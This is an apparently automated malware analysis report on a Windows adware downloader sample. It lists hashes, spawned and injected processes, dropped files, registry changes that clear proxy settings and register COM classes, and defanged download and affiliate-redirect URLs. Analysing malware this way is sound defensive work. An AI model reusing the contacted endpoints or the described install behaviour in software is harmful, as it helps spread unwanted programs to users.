Application.Downloader.RO_325175aa97

by malwarelabrobot on November 14th, 2016 in Malware Descriptions.

not-a-virus:AdWare.Win32.AdLoad.wvar (Kaspersky), Application.Downloader.RO (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 325175aa976eef22d0cc911fbcfdef64
SHA1: 9ed52ce5a43dc37a4ffd38d410301f4766774b90
SHA256: bf5cf82787dc628f22f7ab2cd8a01573e1c9e56d18bd7a46295a3787da05ba50
SSDeep: 12288:BK2mhAMJ/cPlJHiqQF2qTuxS7R38JK8l924IqPKZ5SRWocW:w2O/GlJHQ1lR38Jpl9XIqYIWDW
Size: 582736 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Hul
Created at: 2012-06-09 16:19:49
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

Setup__2140_il2.exe:2308
sevensetup.exe:3356
%original file name%.exe:3580
cpSetup.exe:3976
5827498a25abb_ua.exe:2980
run-setup.exe:3884

The Application injects its code into the following process(es):

Setup__2140_il2.exe:3512

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Setup__2140_il2.exe:2308 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)

The process Setup__2140_il2.exe:3512 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)

The process sevensetup.exe:3356 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)

The Application deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd584D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (0 bytes)

The process %original file name%.exe:3580 makes changes in the file system.
The Application creates and/or writes to the following file(s):

The Application deletes the following file(s):

The process cpSetup.exe:3976 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)

The process run-setup.exe:3884 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes)

The Application deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC40.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp (0 bytes)

Registry activity

The process Setup__2140_il2.exe:2308 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKCR\noesis.beryline]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"

[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following registry key(s):

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
[HKCR\noesis.beryline\CurVer]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
[HKCR\noesis.beryline.1\CLSID]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Programmable]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
[HKCR\noesis.beryline]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
[HKCR\noesis.beryline.1]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process Setup__2140_il2.exe:3512 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKCR\noesis.beryline]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3B 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"

[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process sevensetup.exe:3356 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe,"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:3580 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process cpSetup.exe:3976 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479002472"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process 5827498a25abb_ua.exe:2980 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

The process run-setup.exe:3884 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe,"

Dropped PE files

MD5 File path
a7318ed2c34bd30f5605e0457734826f c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll
aa91653a46d59ef020669de66aa1fb31 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 74526 74752 4.54396 a8692f5ba740240ef0f9a827376f76f9
.rdata 81920 7445 7680 3.46159 d4f36accffde0bf520f52486679ccf0d
.data 90112 96036 512 2.46008 b6c7edb5b7fec47a37a622cc5d71f3f4
.CRT 188416 32 512 0.273198 439411041ee0b8261668525c5c132cd9
.rsrc 192512 16656 16896 3.23905 aa3a7d7ff24a928d00c7a73daacad998

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 567
01d8f21bdcf3f33cfd44b21cda45bbe1
c9ab4e6c1cfc8ff69ab509756fb4bbb2
a93831bd552da93e3bc3af481883f0cb
8512a38a32d856c43d3d53d1298cdf48
27a2aefa7a8141c7e4d47e4e4e4912dd
62535b8e1ac59d327110d422df7027bc
79f46ad15df03ce32082a5b77e5e8484
19154cb115d8d2adce3b82459253bbb3
1ad22ffca5f98db241175ce6612e1c6c
77653dae69494148cf58389a89a9bd40
9663e05c1cb81a47db70ac43ebb824e1
5e2e21eb1cccabe74a231dc8ee7e45ab
a08d1145184718c8cfb3e674cb51bf37
7ec5648ba6020db188003cab70553f79
b1220d6c3e4fc06ac894d65353fb84e6
b0516e031ff5e44241d3bd16b28983d8
64989f7c46d4103fa833fe61c529a1bf
62379b050ee5ee24b5710d77976e4a4c
e47b3680df663a409ff27e7892659d6a
5094e2b5502bb3eb161183ccdd26bee5
d8616b984b03d23f2ddad2ace1e6fcc9
bb3461f9ff7218951e59c6c7d5e18f65
f6794b812107e8db90b8a9adbc3a19d6
babe8174d9e14bddc4572ed8fc3fef02
0c153ff4df276bb5694854186f48e695

URLs

URL IP
hxxp://52.222.174.245/get.php?ses=429155916441231936
hxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.88.21.193
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.246.201.113
hxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.88.21.193
hxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.88.21.193
hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg 52.222.174.190
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg 52.222.174.190
